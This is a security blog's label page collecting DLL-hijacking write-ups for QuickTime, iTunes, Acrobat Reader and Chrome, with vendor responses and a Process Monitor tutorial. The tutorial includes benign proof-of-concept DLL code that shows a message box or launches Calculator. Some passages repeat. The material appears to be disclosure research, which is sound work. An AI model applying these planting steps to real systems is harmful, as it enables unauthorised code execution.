By default QuickTimePlayer installation does't come with CoreFoundation.dll but QT Player tries to load the DLL when started.
Create any malicious DLL and rename it to CoreFoundation.dll, copy to C:\Program Files (x86)\QuickTime\
After copying the DLL if we start QuickTimePlayer we will execute the code part of malicious DLL leading to DLL Injection.
Location: C:\Program Files (x86)\QuickTime\CoreFoundation.dll
Application: QuickTime 7.7.2
OS: Windows 7 Ultimate N SP1
Apples response
After examining your report we do not see any actual security implications.
Writing a file to the C:\Program Files (x86)\QuickTime directory requires local
administrative privileges.
Showing posts with label DLL Injection. Show all posts
Showing posts with label DLL Injection. Show all posts
Saturday, February 14, 2015
Apple iTunes Insecure DLL Loading Code Execution
By default iTunes installation does't come with dwmapi.dll but iTunes tries to load the DLL when started.
Create any malicious DLL and rename it to dwmapi.dll, copy to C:\Program Files (x86)\iTunes\
After copying the DLL if we start iTunes will execute the code part of malicious DLL leading to DLL Injection.
Location: C:\Program Files (x86)\iTunes\dwmapi.dll
Application:iTunes 12.0.1.26
OS: Windows 7 Ultimate N SP1
Apples response
After examining your report we do not see any actual security implications.
Writing a file to the C:\Program Files (x86)\iTunes directory requires local
administrative privileges.
Create any malicious DLL and rename it to dwmapi.dll, copy to C:\Program Files (x86)\iTunes\
After copying the DLL if we start iTunes will execute the code part of malicious DLL leading to DLL Injection.
Location: C:\Program Files (x86)\iTunes\dwmapi.dll
Application:iTunes 12.0.1.26
OS: Windows 7 Ultimate N SP1
Apples response
After examining your report we do not see any actual security implications.
Writing a file to the C:\Program Files (x86)\iTunes directory requires local
administrative privileges.
Acrobat Reader Insecure DLL Loading Code Execution
Rename any malicious DLL to
C:\Program Files\Adobe\Reader 11.0\Reader\ntmarta.dll
which will be loaded by Adobe Acrobat Reader.
PoC Code part of ntmarta.dll
Compile the above code into a Dynamic Loadable Library (DLL).
Tested on
Acrobat Reader 11.0.10
Windows 7 Ultimate N SP1
Refer
http://blog.disects.com/2014/08/dll-injection-executing-and-testing-dlls.html
http://blog.disects.com/2015/02/google-chrome-insecure-dll-loading-code.html
C:\Program Files\Adobe\Reader 11.0\Reader\ntmarta.dll
which will be loaded by Adobe Acrobat Reader.
PoC Code part of ntmarta.dll
#include <windows.h>
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
MessageBox(NULL, L"DLL Injection by Disects!", L"Developed by Praveen Darshanam",
MB_ICONWARNING|MB_CANCELTRYCONTINUE|MB_DEFBUTTON2);
}
Compile the above code into a Dynamic Loadable Library (DLL).
Tested on
Acrobat Reader 11.0.10
Windows 7 Ultimate N SP1
Refer
http://blog.disects.com/2014/08/dll-injection-executing-and-testing-dlls.html
http://blog.disects.com/2015/02/google-chrome-insecure-dll-loading-code.html
Google Chrome Insecure DLL Loading Code Execution
Google Chrome tries to load cryptbase.dll by default from
C:\Program Files\Google\Chrome\Application\ but the dll is not part of the installation.
Chrome fails with DLL Not Found error.
If we copy any malicious DLL renamed as cryptbase.dll to C:\Program Files\Google\Chrome\Application\
Chrome will load and execute the DLL controlled by malicious user.
The source code which I used for building the DLL is at
http://blog.disects.com/2014/08/dll-injection-executing-and-testing-dlls.html
Tested on
Chrome 39.0.2171.95m (latest is also vulnerable)
Windows 7 Ultimate N SP1
Reported to Google but they didn't consider it stating as Local exploit.
C:\Program Files\Google\Chrome\Application\ but the dll is not part of the installation.
Chrome fails with DLL Not Found error.
If we copy any malicious DLL renamed as cryptbase.dll to C:\Program Files\Google\Chrome\Application\
Chrome will load and execute the DLL controlled by malicious user.
The source code which I used for building the DLL is at
http://blog.disects.com/2014/08/dll-injection-executing-and-testing-dlls.html
Tested on
Chrome 39.0.2171.95m (latest is also vulnerable)
Windows 7 Ultimate N SP1
Reported to Google but they didn't consider it stating as Local exploit.
Sunday, September 21, 2014
Finding and Exploiting DLL Injection Vulnerabilities
We need Process Monitor tool, part of sysinternals tools for finding the Vulnerability.
Loading of non-existent Dynamic Linked Libraries (DLL's) for the process under analysis can be found using below Process Monitor filter
Process Name is wab.exe then Include
Path ends with .dll then Include
Result is NAME NOT FOUND then Include
Above Filter and Snapshot shows that Login.exe couldn't find DLL's SXS.dll, CLBCATQ.dll etc.
Created DLL with following Code and rename the DLL to any of SXS.dll, CLBCATQ.dll and copy to the path from where we are executing our vulnerable binary.
#include <windows .h>
#include <stdio .h>
#include <string .h>
BOOL APIENTRY DllMain( HMODULE hModule,DWORD fdwReason,LPVOID lpReserved)
{
MessageBox(NULL,L"DLL Injection by Disects !",
L"developed by Praveen Darshanam",
MB_ICONWARNING | MB_CANCELTRYCONTINUE | MB_DEFBUTTON2);
return TRUE;
}
Search the DLL we injected
To execute calculator we can use below code
#include <windows .h>
int exec_calc()
{
WinExec("calc", 0);
exit(0);
return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason,
LPVOID lpvReserved)
{
exec_calc();
return 0;
}
Done!
Subscribe to:
Comments (Atom)